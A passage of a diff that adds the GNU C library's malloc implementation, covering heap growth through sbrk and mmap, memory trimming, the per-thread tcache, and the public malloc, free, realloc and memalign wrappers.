+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
